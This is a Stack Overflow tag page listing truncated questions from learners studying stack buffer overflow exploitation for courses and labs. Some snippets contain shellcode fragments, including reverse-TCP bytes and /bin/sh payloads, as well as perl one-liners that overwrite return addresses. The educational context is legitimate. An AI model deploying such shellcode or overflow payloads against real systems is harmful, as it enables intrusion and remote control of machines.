It's back! Take the 2018 Developer Survey today »

Tagged Questions

-1
votes
0answers
31 views

Buffer overflow example receiving SEGFAULT instead of executing next instruction on the stack

I am attempting to learn about buffer overflows. I have written a simple C program that calls a function called checkpw() which allocates a char array of 10 bytes large. When I analyze the op code I ...
-1
votes
1answer
40 views

Is there any other ways to make the program print hostname to stdout or just shellcode?

It is a lab assignment asking us to exploit this program. The first task is to call the notcalled function(which is solved by change the return address to the notcalled function :perl -e 'printf "A"...
0
votes
1answer
53 views

Illegal Instruction when trying to get shell from a simple stackoverflow

I'm trying to exploit the stack overflow vulnerability to get a shell. When i tried to run it, It shows illegal hardware instruction after executing the shellcode instead of giving a shell(error ...
0
votes
0answers
32 views

32bit buffer overflow exploit: why do I need a 4byte distance from system address to '/bin/sh' address on stack?

so I have been playing around with buffer overflow exploits on 32bit system. I think I understand the basics and what I expected was to build an exploit in the form (from loweraddress - top to ...
1
vote
0answers
204 views

Why reverse_tcp Shellcode doesn't work?

I am using this shellcode: \x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\xc0\xa8\x0f\x81\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\...
0
votes
1answer
87 views

$esp register not found

I am learning debugging with gdb and registers, but I am stuck in one point. As an instruction, I should print print $esp result: $1 = -9008 but I was expecting such result: $2 = (void *) ...
3
votes
2answers
1k views

Disabling stack protection in GCC not working

I'm trying to recreate a stack buffer overflow using the classic overflow with strcpy using this function: #include <stdio.h> #include <string.h> void main(int argc, char **argv) { ...
5
votes
3answers
2k views

Why is my stack buffer overflow exploit not working?

So I have a really simple stackoverflow: #include <stdio.h> int main(int argc, char *argv[]) { char buf[256]; memcpy(buf, argv[1],strlen(argv[1])); printf(buf); } I'm trying to ...
1
vote
0answers
97 views

\x00 treated as null byte and doesnt count

I'm trying to learn about stack overflow, when I want to overwrite the eip register i type in my shell this command: run $(perl -e 'print "\xb8\x06\x40\x00" x 20;') it supposed to overwrite the ...
0
votes
0answers
74 views

ESP after SEH Exception with same program on different computers

Below are a few articles that exploit different programs by using ESP after the SEH exception to POPAD back to a controllable part of the stack. The other article demonstrates stack pivoting finding ...
2
votes
1answer
98 views

First experiments with buffer overflow

I've started reading about buffer overflow and how hackers use it to execute custom code instead of the regular compiled one and now I'm trying to reproduce some basic situations, with a vurnerable ...
-4
votes
2answers
66 views

Undefined computer behavior after running a C program

I am getting right to the point because I cannot explain the situation that I am going to describe. I need your attention please! Yesterday I wrote a program in C. The program takes as input a string ...
1
vote
1answer
202 views

How to prevent stack overflow when dealing with long recursive productions in C?

Given a grammar, how can one avoid stack overflow problem when calculating FIRST and FOLLOW sets in C. The problem arose in my code when I had to recurse through a long production. Example: S->...
4
votes
1answer
838 views

Stack-based buffer overflow - challenge in C using scanf with limited input

As part of a security CS course, my class has been given the task of exploiting a vulnerability to beat a password check using a stack/buffer overflow. The code with the vulnerability is as follows: #...
1
vote
1answer
829 views

Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential

I'm looking at aleph's article on phrack magazine. The code below can also be found there. We have a vulnerable executable which it's code is: vulnerable.c void main(int argc, char *argv[]) { ...
0
votes
2answers
664 views

Exploit Development - Shellcode Doesn't Work?

I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit. Firstly, I found the position of EIP was after the 26089 As (at ...
1
vote
1answer
224 views

segmentation error while injecting shellcode to stack smash

I have been trying to understand how stack overflow attacks work. So far I can successfully redirect the return address to an instruction inside the original code. I have written a shellcode launcher ...
-2
votes
2answers
235 views

How to do Infinite Loop

My aim is to write an infinite loop. I have to print infinitely this string "Hello World %s" and I can just use ROP (Return-oriented programming). gcc -fno-stack-protector loop.c -o loop I can ...
0
votes
1answer
909 views

Nop Sled, can you explain it to me?

I have been reading this book: Hacking, the art of exploitation On page 140, the book explains the Nop Slide: We’ll create a large array (or sled) of these NOP instructions and place it before ...
0
votes
0answers
241 views

Why variable 'pass' change it's value after stack buffer overflow?

I can't understand what's happening with buf1 and pass in main(). I understand that after buffer overflow in gets(buf1): Firstly (by input more then 15 characters), we are actually changing calling ...
0
votes
1answer
187 views

change the return address to point to shellcode

Im using linux and I have c program, I would like to change the return address to point to my shellcode, im unable to do it. Here is my shellcode "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\...
0
votes
1answer
186 views

why putenv(buf) doesn't work properly because memcpy(buf + 92, “\x00\x14\xe4\xf7” , 4) copies a \x00 byte to buf?

am using ubuntu 14.04. So am having latest kernel. am trying to do Return to libc method. here is my code to create a environment variable, which will be later input to the victim code #include<...
16
votes
3answers
1k views

Should the memory vulnerability of the line of code “printf(”%s“, argv[1]);” be described as a stack overflow?

Today, I took a short "C++ skills test" from Elance.com. One question was the following: What is the security vulnerability of the following line of code: printf("%s", argv[1]); Option 1:...
3
votes
1answer
417 views

How to set a gdb watchpoint to a value stored in register?

I'm trying to detect stack overflow in some function, and want to set a watchpoint to a memory pointed by the RSP register. I can't just set a watchpoint to a certain address as the function could be ...
-1
votes
1answer
137 views

need to detect any possible buffer overflows

hi guys i need some help with this code. i want to know if there is any buffer overflow in this code. basically this is an exercise for my university. we need to exploit it to open a shell. until now ...
8
votes
2answers
24k views

Malloc segmentation fault

Here is the piece of code in which segmentation fault occurs (the perror is not being called): job = malloc(sizeof(task_t)); if(job == NULL) perror("malloc"); To be more precise, gdb says that ...
1
vote
2answers
264 views

Overflowing a stack in theory.. and assembly

Assuming an x86 system with no aslr I'd like to ask the following; 1) Theory says that when we execute a stack overflow attack, the value pointed to by the ebp register is overwritten with the new ...
1
vote
1answer
106 views

Does each process has its own portion of utopia in the memory?

By doing some cat /proc/*some PID*/maps on multiple processes on a machine, I notice they all have the same starting point in regards to memory address, being 0x8048000. Does this mean that every ...
9
votes
3answers
622 views

Smashing the stack example3.c confusion

Article can be found here. I'm reading up on smashing the stack and have found myself to be getting stuck on example3.c. 0x80004a3 <main+19>: call 0x8000470 <function> 0x80004a8 <...
6
votes
2answers
3k views

What is the difference between STATUS_STACK_BUFFER_OVERRUN and STATUS_STACK_OVERFLOW?

I just found out that there is a STATUS_STACK_BUFFER_OVERRUN and a STATUS_STACK_OVERFLOW. What's the difference between those 2? I just found Stack overflow (stack exhaustion) not the same as stack ...
0
votes
1answer
127 views

Are the old days of code injection over? [closed]

I was wondering since all updated operating systems guard against stack and heap type overflows via ASLR, Canary Checks, and other such methods, are memory corruption exploits still prevalent? Given ...
0
votes
1answer
908 views

Rewriting EBP stack return value

Hi I'm trying to write an overflow exploit for a simple program that I've built. Bellow is the C program that I've written. #include <unistd.h> #include <string.h> #include <stdio.h>...
2
votes
5answers
4k views

Execution of function pointer to Shellcode

I'm trying to execute this simple opcode for exit(0) call by overwriting the return address of main. The problem is I'm getting segmentation fault. #include <stdio.h> char shellcode[]= "/0xbb/...
0
votes
2answers
373 views

Is buffer-overflow considered a “solved problem” ? (at least for future systems)

I am looking at various buffer/heap/stack protection technologies such as PAX, DEP, NX, CANARIES, etc And a new one SMEP - http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-...
8
votes
1answer
3k views

return to libc - problem

I'm having problems with return-to-libc exploit. The problem is that nothing happens, but no segmentation fault (and yes I'm actually overflowing the stack). This is my program: int main(int argc, ...
1
vote
3answers
419 views

Buffer Overflow-Not getting the Correct output

the Shell code print the hostname(bin/hostname). but when i execute the code its shows me the the path in reverse order but not printing the HOSTNAME. I am actually doing the buffer over flow . I ...
-1
votes
4answers
141 views

problem with ansi c unexpected behaviour? [closed]

I am suffering from an unexpected behavior; here is the problem definition: I have applications communicating on a LAN via UDP protocol. I am reading the IP address and port number from a text file. ...
1
vote
4answers
385 views

about buffer overflow

I am new to the ethical hacking world, and one of the most important things is the stack overflow, anyway I coded a vulnerable C program which has a char name [400] statement, and when I try to run ...
3
votes
3answers
2k views

Illustration of buffer overflows for students (linux, C)

My friend is teacher of first-year CS students. We want to show them buffer overflow exploitation. But modern distribs are protected from simples buffer overflows: HOME=`perl -e "print 'A'x269"` ...
13
votes
3answers
385 views

Causing PHP to crash

How can PHP cause memory leaks, buffer overflows, stack overflows and any other errors of such kind? Can PHP even cause such errors?
3
votes
3answers
642 views

Setting up Environment for Buffer Overflow Learning

I am currently reading several security books(my passion) regarding secure programming, however either the distro's they provide on disc are faulty, or non-existent. Books:Hacking The art of ...
48
votes
9answers
22k views

What is the difference between a stack overflow and buffer overflow?

What is different between stack overflow and buffer overflow in Programming ?
5
votes
3answers
4k views

Is there any way to bypass SSP (StackSmashing Protection)/Propolice?

After some research i haven't found any paper describing method to do this (no even an unreliable one). It seems that SSP (StackSmashing Protection)/Propolice
5
votes
2answers
5k views

stack execution protection and randomization on ubuntu

As part of a course assignment i need to write an exploit code to cause a buffer overflow and execute code that is present on stack. I have turned off the stack randomiztion by the following command: ...
7
votes
3answers
5k views

Stack Overflow Exploit in C

The question is actually about stack overflows in C. I have an assigment that I can not get done for the life of me, I've looked at everything in the gdb and I just cant figure it. The question is ...